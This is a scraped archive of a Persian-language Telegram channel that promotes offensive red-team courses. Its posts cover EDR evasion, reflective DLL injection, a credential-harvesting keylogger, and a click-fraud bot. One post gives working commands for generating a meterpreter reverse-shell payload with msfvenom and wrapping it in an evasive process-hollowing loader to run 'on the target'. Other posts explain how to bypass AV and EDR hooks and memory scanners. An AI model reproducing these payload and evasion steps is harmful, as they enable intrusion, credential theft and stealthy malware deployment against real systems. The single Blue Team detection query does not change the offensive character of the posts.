fa
Feedback
RedTeamAPT Academy

RedTeamAPT Academy

رفتن به کانال در Telegram

Topics: Red team (NetWork)❗️ coding(c,python,powershell,bash)🧑‍💻 Phishing 👂 Penetration testing 👁 vulnerability 🦠 Group : @RedTeamAcademyChat Admin : @RedTeamAdmin1 این کانال برای مباحث آموزشی میباشد و جنبه تخریب و اتک ندارد .

نمایش بیشتر
کشور مشخص نشده استدسته بندی مشخص نشده است
2 096
مشترکین
-5224 ساعت
-4597 روز
-2 47630 روز
آرشیو پست ها
بخشی از دوره Rust Offensive Programming مباحث ابتدایی و پایه زبان راست @RedTeamAcademy

🦀 پیرو ابزار نویسی پست قبل (Rust) 🦀 خیلی سبک تر از burp suite 🦀 این ابزار در دست ارتقاست ! @RedTeamAcademy
+6
🦀 پیرو ابزار نویسی پست قبل (Rust) 🦀 خیلی سبک تر از burp suite 🦀 این ابزار در دست ارتقاست ! @RedTeamAcademy

این ابزاری هست که با زبان rust نوشتم برای شکار مواردی که در وب هست جا داره تا بیشتر کد بزنیم و به یه نسخه جمو جورburp suite ش
+2
این ابزاری هست که با زبان rust نوشتم برای شکار مواردی که در وب هست جا داره تا بیشتر کد بزنیم و به یه نسخه جمو جورburp suite شخصی برسه برای پروژه های تست نفوذ با قابلیت های بیشتر پیدا کردن مسیر های مهم ، فایل ها ، دایرکتوری , HTTP Request/Response Inspector و .... من همین الان با همین کلی داستان های عجیب از تو سایت ها بدست اوردم ! تو عکس مشخصه یسری هاش .... این ابزار فقط با یک کلیک این موارد رو بهتون میده که بیشترش هم میشه کرد ! حالا برای os هم میشه با مکانیزم های دیگ نوشت که بره چیزای دیگ پیدا کنه ! @RedTeamAcademy

Offensive Rust Programming Course 👾 🦀 Philosophy & The Shift 🦀 Technical Mechanics (Ownership & Memory) 🦀 Red Team Perspective & Evasion 🦀 Counter-Strategy & Blue Team @RedTeamAcademy

Offensive RUST Programming Course Loading ..... ☠️🦀 @RedTeamAcademy
Offensive RUST Programming Course Loading ..... ☠️🦀 @RedTeamAcademy

دوستانی که قصد درک بالا سیستم عامل و دور زدن انتی ویروس و edr هارو دارند دوره windows internal پایه ای ترین دوره در این سطح هست . ما در ادامه میریم سراغ دوره edr evading و قطعا پیش نیازش مباحث دوره Redteam ، windows internal ، اشنایی با زبان برنامه نویسی c , c++ هست . نمیتونید بدون درک و شناخت وارد دوره های بعدی بشید ، خروجی براتون نداره حالا دوره windows kernel programming که هیچی ... . 🔴 پست قبل بخشی از دوره Windows Internal فصل چهارم بود 🔴 خرید و اطلاعات دوره (بدون VPN) : 🔴 دوره آموزشی Windows Internal با نگاه RedTeam 🔴 دوره آموزشی RedTeam

1️⃣ بخش اول: لایه کاربر (TEB - Thread Environment Block) ،آدرس پایه TEB (0x000000504BD1E000). جالب اینجاست که بلاک کل پروسس (
1️⃣ بخش اول: لایه کاربر (TEB - Thread Environment Block) ،آدرس پایه TEB (0x000000504BD1E000). جالب اینجاست که بلاک کل پروسس (PEB) هم دقیقاً در یک قدمی اون قرار داره! محدوده استک (Stack) این ترد هم مشخصه؛ یعنی ویندوز دقیقاً میدونه متغیرهای محلی این ترد کجای رم قرار دارن. 2️⃣ بخش دوم: لایه حفاظت‌شده کرنل (KTHREAD & ETHREAD) این فضا ممنوعه است! برنامه‌های عادی حق ندارن مستقیم بهش نگاه کنن، اما با سوءاستفاده از APIهای پنهان ntdll.dll اطلاعاتش رو بیرون کشیدم: 🔹 بخش Thread Priority (KTHREAD): اولویت زمان‌بندی ترد رو نشون میده که پردازنده چقدر بهش بها میده (اینجا عدد 9 هست). 🔹 بخش Exit Status (ETHREAD): مقدارش ۲۵۹ یا همون STATUS_PENDING هست؛ یعنی ترد کماکان زنده و در حال اجراست! 🔹 بخش Kernel Mode Time: نزدیک ۳۱۲,۵۰۰ تیک پردازنده در سطح کرنل صرف لود کردن و تخصیص حافظه این ترد شده. 💡 بدافزارهای پیشرفته و ابزارهای ردتیم (Red Teaming) به جای صدا زدن APIهای رسمی ویندوز (که توسط آنتی‌ویروس‌ها هوک میشن)، مستقیم میان سراغ همین آدرس‌های حافظه تا مخفیانه هویت خودشون رو جعل کنن یا دباگرها رو دور بزنن! @RedTeamAcademy

🕵️‍♂️ بررسی یک Keylogger  اما کاربردی از دیدگاه MalDev و Red Team بخشی از دوره Windows Internal (بدون vpn) یک نمونه اسکریپت لایو از یک Window-Aware Keylogger رو  که به زبان C++ نوشته شده در لینک های انتهایی پست مشاهده میکنید اما این ابزار دقیقاً چطور کار میکنه و در عملیات‌های تیم قرمز چه کاربردی داره؟ 🔍 این keylogger چطور کار می‌کنه؟ برخلاف keylogger سنتی که فقط یک متن طولانی و نامفهوم از کلیدها پس می‌دن، این نمونه هوشمندتر عمل میکنه: 1. Window Tracking 2. Key Mapping & Logging 3. Contextual Output --- 🔥 در سناریوهای Red Teaming با این ابزار چه کارهایی میشه کرد؟ یک کی‌لاگر پنجره-محور در فاز Post-Exploitation یا دسترسی اولیه، اهداف زیر رو دنبال می‌کنه: * سرقت اطلاعات حساس (Credential Harvesting): شکار نام‌های کاربری، پسوردها و توکن‌های احراز هویت به محض تایپ شدن در پنجره‌های لاگین یا مرورگر. * مانیتورینگ رفتار ادمین (Reconnaissance): همانطور که در تصویر مشخصه، مهاجم دقیقاً می‌بینه ادمین چه دستوراتی رو در PowerShell یا Run ویندوز وارد می‌کنه (مثلاً دستورات ابزارهای داخلی، جا‌به‌جایی در دایرکتوری‌ها و...). * کشف ساختار شبکه و سیستم: مانیتور کردن نام فایل‌ها، تایتل پنجره‌های باز و برنامه‌های کاستوم سازمانی که هدف ازشون استفاده می‌کنه. https://www.linkedin.com/posts/omid-abiri-redteamapt_redteam-security-it-share-7480611260296957952-KgLd/?utm_source=social_share_send&utm_medium=member_desktop_web&rcm=ACoAAFjfyKoBT5fWVrc66SK8KuCpZMLK3C-Ecwc

باتوجه به شرایط فعلی که مشخص نیست مجدد جنگ شروع بشه یا خیر و نت ها مجدد قطع بشه یا پایدار بمونه دوستان تو بله میتونن با ما همراه بشن در صورت قطع اینترنت فعالیت اونجا مجدد شروع میشه و الا در تلگرام فعالیت ما پابرجا خواهد بود 🆔 شناسه: https://ble.ir/RedTeamAPT

همانطور که دیدید، کانال‌های قبلی ما به خاطر انتشار سناریوهای عملی و اتک‌های واقعی (Real-World) با ریپورت پلتفرم مواجه و بسته شدند. تلگرام روی این مدل محتوای حساس به شدت سخت‌گیر است. حیفه ین موارد ارشیو بشه فقط برای خودم ؛ به همین خاطر از این به بعد تمام گزارش‌های فنی، تحلیل اتک‌های واقعی و سناریوهای Red Teaming را با رعایت اصول محرمانگی در لینکدین منتشر می‌کنم. (دقیقا مثل قبل) اولین کیس‌ واقعی (کشف دسترسی و لو رفتن اطلاعات حساس زیرساخت مانیتورینگ گمرک) را همین امروز آپلود کردم. اگر می‌خواهید تحلیل‌های فنی و اتک‌های واقعی را از این به بعد دنبال کنید، از طریق لینک زیر کانکت شوید: www.linkedin.com/in/omid-abiri-redteamapt

فصل سوم از دوره Windows Internal با دید RedTeam منتشر شد. فصل اول و دوم دوره نیز منتشر شده است. نمونه ویدیو های دوره و توضیحا
فصل سوم از دوره Windows Internal با دید RedTeam منتشر شد. فصل اول و دوم دوره نیز منتشر شده است. نمونه ویدیو های دوره و توضیحات در سایت منتشر شده است . تمامی ابزار ها و کد ها نوشته در دوره به دوستان ارسال میشود . تهیه دوره : @RedTeamAdmin1 اطلاعات دوره : دوره آموزشی Windows Internal (بدون VPN)

چالش امنیتی: عملیات شبح (تزریق کد و دور زدن EDR) 💻🔥 🎯 سناریو: شما به عنوان یک Red Teamer به یک سیستم Windows 10 x64 دسترسی (با دسترسی Administrator) پیدا کرده‌اید. هدف شما اجرای یک شل‌کد کوچک (مثلاً پاپ‌آپ کردن calc.exe) در بستر یک فرآیند قانونی و در حال اجرا (مثل notepad.exe) است. 🛡 موانع (EDR سفارشی سیستم): یک EDR سخت‌گیر روی سیستم فعال است که مکانیزم‌های دفاعی زیر را دارد: 1️⃣ User-Mode Hooking: توابع حساس مانند NtCreateThreadEx، NtWriteVirtualMemory، CreateRemoteThread و QueueUserAPC را در سطح User-Mode رهگیری می‌کند. 2️⃣ Heuristics & Memory Scanning: به شدت روی نواحی حافظه با مجوز RWX حساس است (به ویژه مموری‌های Unbacked) و Call Stackها را برای پیدا کردن منشأ اجرای غیرطبیعی بررسی می‌کند. 3️⃣ Parent-Child Anomalies: ایجاد پروسه‌های جدید توسط پروسه‌های غیرمرتبط یا تزریق‌های مشکوک بین پروسه‌ای را مانیتور می‌کند. 🔴 برای دور زدن User-Mode Hooks: باید به Direct Syscalls (مثل استفاده از ابزار SysWhispers) یا بهتر از آن Indirect Syscalls (برای طبیعی جلوه دادن Call Stack با پرش به ntdll.dll) اشاره کنند. 🔴 برای فرار از Memory Scanning (RWX و Unbacked Memory): باید به جای VirtualAllocEx، از تکنیک Module Stomping / Module Overloading استفاده کنند. (یعنی یک DLL قانونی که استفاده نمی‌شود را در notepad.exe لود کنند و شل‌کد خود را روی بخش .text آن اوررایت (Overwrite) کنند تا حافظه، پشتوانه فایل فیزیکی یا همان File-backed داشته باشد و در نهایت با مجوز RX اجرا شود نه RWX). 🔴 برای فرار از Thread Creation (دور زدن مانیتورینگ EID 8 و APIها): به جای ساخت Thread جدید، باید از تکنیک Thread Hijacking استفاده کنند (Suspend کردن یک Thread موجود در notepad، تغییر RIP به آدرس شل‌کد با SetThreadContext، و سپس Resume کردن آن). 🔴 گزینه جایگزین با توجه به دسترسی Admin: چون دسترسی Admin دادید، استفاده از تکنیک BYOVD (Bring Your Own Vulnerable Driver) برای کور کردن موقت EDR از طریق Kernel-Mode هم یک جواب کاملاً معتبر و سطح بالاست! 🆔 @RedTeamAcademy 🌐https://redteamapt.ir

هنر دور زدن Sysmon (EID 7) با Reflective DLL Injection و چالش‌های OPSEC مهاجمان حرفه‌ای علاقه‌ای به جا گذاشتن ردپا روی دیسک ندارند. تزریق DLL بازتابی (Reflective DLL Injection) یک تکنیک پیشرفته است که به ما اجازه می‌دهد یک پی‌لود (مانند Cobalt Strike Beacon یا Meterpreter) را مستقیماً و به صورت دستی (Manual Mapping) داخل حافظه یک فرآیند هدف بارگذاری کنیم. 🔥 مزیت تهاجمی (چرا EID 7 دور زده می‌شود؟) در حالت عادی، وقتی یک DLL لود می‌شود، سیستم‌عامل درگیر شده و Sysmon Event ID 7 (ImageLoad) لاگ می‌اندازد. اما شاهکار Reflective Injection این است که نیازی به توابع استاندارد ویندوز (مثل LoadLibrary) ندارد. ماژول مخرب خودش نقش OS Loader را بازی کرده و وابستگی‌ها را در حافظه حل می‌کند. نتیجه؟ سیستم‌عامل متوجه لود شدن ماژول جدید نمی‌شود، EID 7 به هیچ وجه تریگر نمی‌گردد، و رادارهای مبتنی بر مانیتورینگ ماژول کاملاً کور می‌شوند. ⚠️ خطاهای OPSEC و فرصت‌های Blue Team آیا با این روش کاملاً نامرئی هستیم؟ خیر! اگرچه لود شدن ماژول پنهان می‌ماند، اما اجرای آن در فرآیند هدف نیازمند ایجاد یک Thread جدید است. مهاجمانی که از روش‌های پایه برای تزریق استفاده می‌کنند، معمولاً روی Sysmon Event ID 8 (CreateRemoteThread) شکار می‌شوند. همچنین، تخصیص حافظه از نوع PAGE_EXECUTE_READWRITE (RWX) که پشتوانه فایل فیزیکی روی دیسک (Unbacked Memory) ندارد، لقمه چرب و نرمی برای Memory Scannerهای ابزارهای EDR است. 🔍 شکار تهدید (دیدگاه Blue Team): تیم‌های دفاعی به جای جستجوی ماژول‌های لود شده، باید به دنبال تزریق‌های حافظه و Threadهای مشکوک بگردند. کوئری زیر (SPL/KQL-مانند) به دنبال پروسه‌هایی می‌گردد که در حال تزریق Thread به پروسه‌های استاندارد ویندوز هستند:
EventID=8
| where TargetImage has_any ("explorer.exe", "svchost.exe", "rundll32.exe", "notepad.exe")
| where SourceImage != TargetImage
| project TimeGenerated, Hostname, SourceImage, TargetImage, StartAddress, StartFunction
💡 نکته پیشرفته برای Red Team: برای ارتقای OPSEC و دور زدن هشدارهای EID 8 و اسکنرهای حافظه، مهاجمان پیشرفته به جای CreateRemoteThread از تکنیک‌هایی نظیر Thread Hijacking یا APC Injection (Early Bird) استفاده می‌کنند و برای فرار از حافظه‌های RWX به سراغ تکنیک‌های Module Stomping می‌روند. 🆔 @RedTeamAcademy 🌐 https://RedTeamApt.ir

🔴 لودر شل‌کد فوق‌العاده گریزناپذیر برای Red Team یک ابزار قدرتمند و نسبتاً جدید در حوزه Red Team که اخیراً توجه زیادی جلب کرده، Rattle هست. این ابزار یک Shellcode Loader Generator بسیار evasive محسوب می‌شه که مخصوص عملیات نفوذ و دور زدن تشخیص EDR/AV طراحی شده. هدف اصلیش اجرای شل‌کد دلخواه با حداقل ردپا و حداکثر پنهان‌کاری در سیستم هدف است. قابلیت‌های کلیدی: - تولید لودرهای شل‌کد گریزناپذیر با تکنیک‌های پیشرفته تزریق و بارگذاری حافظه - پشتیبانی از روش‌های تزریق متنوع: Process Hollowing ، Remote Process Injection و تخصیص حافظه سفارشی - مبهم‌سازی (Obfuscation) قوی شل‌کد و منطق لودر برای سخت کردن تحلیل استاتیک و دینامیک - تکنیک‌های پیشرفته دور زدن EDR/AV شامل Direct Syscalls* ، *Dynamic Unhooking*، Memory Encryption و ... - نوشته‌شده با C/C++ برای کنترل سطح پایین و عملکرد بهینه نحوه استفاده:

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=... LPORT=... -f raw -o payload.bin

.\Rattle.exe -s payload.bin -t hollow -o loader.exe

# -e : فعال‌سازی encryption
# -u : فعال‌سازی unhooking
لودر تولیدشده (loader.exe) رو روی هدف اجرا کنید و لذت ببرید! 🚀 --- 🆔 @RedTeamAcademy 🌐 https://redteamacademy.ir

RedTeam 🔴 vs 🔵 BlueTeam بخشی از دوره Windows Internal فصل 3 Early Bird Asynchronous Procedure Call APC Queue دوره های آموزشی (بدون VPN) دوره آموزشی Windows Internal (بدون VPN) راهنمایی و شرکت در دوره ها : @RedTeamAdmin1 @RedTeamAcademy

جنگ واقعی RedTeam و BlueTeam اینجا رخ میده . بخشی از دوره Windows Internal فصل 3 دوره آموزشی Windows Internal @RedTeamAcademy
جنگ واقعی RedTeam و BlueTeam اینجا رخ میده . بخشی از دوره Windows Internal فصل 3 دوره آموزشی Windows Internal @RedTeamAcademy

RedTeam 🔴 vs 🔵 BlueTeam دوستانی که دنبال مباحث پیشرفته (APT) هستند میتوانند این ویدیو رو که بخشی از فصل سوم دوره Windows Internal هست رو مشاهده کنند . @RedTeamAcademy

دیشب داشتم روی یه چیزی کار میکردم با پایتون خودش میره رفتار انسان رو هر سایتی بخواییم شبیه سازی میکنه کلید میکنه اسکرول میکنه
+1
دیشب داشتم روی یه چیزی کار میکردم با پایتون خودش میره رفتار انسان رو هر سایتی بخواییم شبیه سازی میکنه کلید میکنه اسکرول میکنه جایی نیاز باشه میره پست یا ویدیویی رو لایک میکنه بازدید میفرسته از گوگل با این کلمه کلیدی ( مثلا : آموزش آشپزی 😅) وارد این سایت بشه میتونید مدیریت ترد رو داشته باشید برای سرعت بیشتر پراکسی تعریف کنید برای لو نرفتن روی هر چنتا لینک و سایت و .... بماند که من این رو برای یه کاری درست کردم😎 @RedTeamAcademy

تمامی کد ها و نوت ها ب دوستان تو همه دوره ها ارسال میشه مخصوصا Windows Internal که بتونن روی کد ها کار کنن و متوجه ساختار بشن و .... !!! دوستانی که تهیه کردند متوجه هستند که این کد ها پیاده سازی ..... هستند حتی کدی که در ادامه برای همین ویدیو تست میشه !!! @RedTeamAcademy

بخشی از دوره Windows Internal فصل 3 به جرات میتونم بگم فصل 3 پر از نکته های این شکلی هست دوستان BlueTeam , Red Team , Soc این ویدیو رو از دست ندید فصل 1 و 2 دوره منتشر شده است @RedTeamAcademy